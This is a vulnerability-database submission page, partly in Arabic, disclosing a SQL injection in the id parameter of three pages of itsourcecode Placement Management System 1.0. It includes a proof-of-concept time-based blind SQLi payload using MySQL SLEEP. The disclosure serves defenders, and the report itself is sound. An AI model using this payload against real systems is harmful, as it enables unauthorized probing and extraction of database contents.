إرسال #383865: itsourcecode Placement Management System 1.0 SQLiالمعلومات

عنوان	itsourcecode Placement Management System 1.0 SQLi
الوصف	In the view_company.php, view_drive.php, and view_student.php pages, an id parameter can be passed to query data. However, due to inadequate filtering of the id parameter on these pages, SQL injection vulnerabilities are present. ——————————POC——————————— Parameter: id (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 5490 FROM (SELECT(SLEEP(5)))qDPR) AND 'HyHB'='HyHB
المصدر	⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE11-4.md
المستخدم	Dee.Mirage (UID 71702)
ارسال	31/07/2024 04:22 PM (2 سنوات منذ)
الاعتدال	03/08/2024 08:49 AM (3 days later)
الحالة	تمت الموافقة
إدخال VulDB	273543 [itsourcecode Placement Management System 1.0 view_company.php معرف حقن SQL]
النقاط	20

Do you need the next level of professionalism?

Upgrade your account now!